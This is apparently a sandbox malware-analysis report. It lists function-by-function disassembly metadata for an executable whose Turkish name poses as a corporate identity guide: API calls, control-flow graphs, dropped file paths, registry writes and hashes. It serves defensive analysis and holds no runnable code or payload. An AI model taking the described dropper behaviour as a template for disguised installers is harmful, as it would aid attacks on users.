                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                          • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                          • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1022 406624-406644 GetSystemDirectoryW 1023 406646 1022->1023 1024 406648-40664a 1022->1024 1023->1024 1025 40665b-40665d 1024->1025 1026 40664c-406655 1024->1026 1028 40665e-406691 wsprintfW LoadLibraryExW 1025->1028 1026->1025 1027 406657-406659 1026->1027 1027->1028
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                          • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1029 4057f1-40583c CreateDirectoryW 1030 405842-40584f GetLastError 1029->1030 1031 40583e-405840 1029->1031 1032 405869-40586b 1030->1032 1033 405851-405865 SetFileSecurityW 1030->1033 1031->1032 1033->1031 1034 405867 GetLastError 1033->1034 1034->1032
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 3449924974-3370423016
                                                                                                                                                                                          • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                          • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1035 405ddf-405deb 1036 405dec-405e20 GetTickCount GetTempFileNameW 1035->1036 1037 405e22-405e24 1036->1037 1038 405e2f-405e31 1036->1038 1037->1036 1039 405e26 1037->1039 1040 405e29-405e2c 1038->1040 1039->1040
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9), ref: 00405E18
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                          • API String ID: 1716503409-3204459172
                                                                                                                                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                          • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1041 6f3d1777-6f3d17b6 call 6f3d1b5f 1045 6f3d17bc-6f3d17c0 1041->1045 1046 6f3d18d6-6f3d18d8 1041->1046 1047 6f3d17c9-6f3d17d6 call 6f3d2394 1045->1047 1048 6f3d17c2-6f3d17c8 call 6f3d2352 1045->1048 1053 6f3d17d8-6f3d17dd 1047->1053 1054 6f3d1806-6f3d180d 1047->1054 1048->1047 1057 6f3d17df-6f3d17e0 1053->1057 1058 6f3d17f8-6f3d17fb 1053->1058 1055 6f3d182d-6f3d1831 1054->1055 1056 6f3d180f-6f3d182b call 6f3d2569 call 6f3d15b4 call 6f3d1272 GlobalFree 1054->1056 1061 6f3d187e-6f3d1884 call 6f3d2569 1055->1061 1062 6f3d1833-6f3d187c call 6f3d15c6 call 6f3d2569 1055->1062 1082 6f3d1885-6f3d1889 1056->1082 1059 6f3d17e8-6f3d17e9 call 6f3d2aac 1057->1059 1060 6f3d17e2-6f3d17e3 1057->1060 1058->1054 1063 6f3d17fd-6f3d17fe call 6f3d2d37 1058->1063 1073 6f3d17ee 1059->1073 1066 6f3d17e5-6f3d17e6 1060->1066 1067 6f3d17f0-6f3d17f6 call 6f3d2724 1060->1067 1061->1082 1062->1082 1076 6f3d1803 1063->1076 1066->1054 1066->1059 1081 6f3d1805 1067->1081 1073->1076 1076->1081 1081->1054 1085 6f3d188b-6f3d1899 call 6f3d252c 1082->1085 1086 6f3d18c6-6f3d18cd 1082->1086 1091 6f3d189b-6f3d189e 1085->1091 1092 6f3d18b1-6f3d18b8 1085->1092 1086->1046 1089 6f3d18cf-6f3d18d0 GlobalFree 1086->1089 1089->1046 1091->1092 1093 6f3d18a0-6f3d18a8 1091->1093 1092->1086 1094 6f3d18ba-6f3d18c5 call 6f3d153d 1092->1094 1093->1092 1095 6f3d18aa-6f3d18ab FreeLibrary 1093->1095 1094->1086 1095->1092
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DB2
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DB7
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DBC
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1825
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6F3D18AB
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D18D0
                                                                                                                                                                                            • Part of subcall function 6F3D2352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D2383
                                                                                                                                                                                            • Part of subcall function 6F3D2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F3D17F6,00000000), ref: 6F3D27F4
                                                                                                                                                                                            • Part of subcall function 6F3D15C6: wsprintfW.USER32 ref: 6F3D15F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                                                                                          • Opcode ID: e00a02269eab12be41971bbe76c7f6409cdd41395e37f7da7a09d5edba3643d5
                                                                                                                                                                                          • Instruction ID: ecabbd3d3a31781f7b35a195d16577b540b3fb06e90367d8448093553a123213
                                                                                                                                                                                          • Opcode Fuzzy Hash: e00a02269eab12be41971bbe76c7f6409cdd41395e37f7da7a09d5edba3643d5
                                                                                                                                                                                          • Instruction Fuzzy Hash: D641BF735003049BEB10EF74D984BCA37ADBF06325F04416AF9569E1C6DBB9D194C760
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1098 4023e4-402415 call 402c41 * 2 call 402cd1 1105 402ac5-402ad4 1098->1105 1106 40241b-402425 1098->1106 1107 402427-402434 call 402c41 lstrlenW 1106->1107 1108 402438-40243b 1106->1108 1107->1108 1111 40243d-40244e call 402c1f 1108->1111 1112 40244f-402452 1108->1112 1111->1112 1116 402463-402477 RegSetValueExW 1112->1116 1117 402454-40245e call 403116 1112->1117 1120 402479 1116->1120 1121 40247c-40255d RegCloseKey 1116->1121 1117->1116 1120->1121 1121->1105 1123 40288b-402892 1121->1123 1123->1105
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp
                                                                                                                                                                                          • API String ID: 2655323295-2038357784
                                                                                                                                                                                          • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                          • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Enum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 464197530-0
                                                                                                                                                                                          • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                          • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                          • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,76FC3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405C48
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                            • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 00401640
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                                                          • API String ID: 1892508949-3016365613
                                                                                                                                                                                          • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                          • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                            • Part of subcall function 0040427D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                          • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
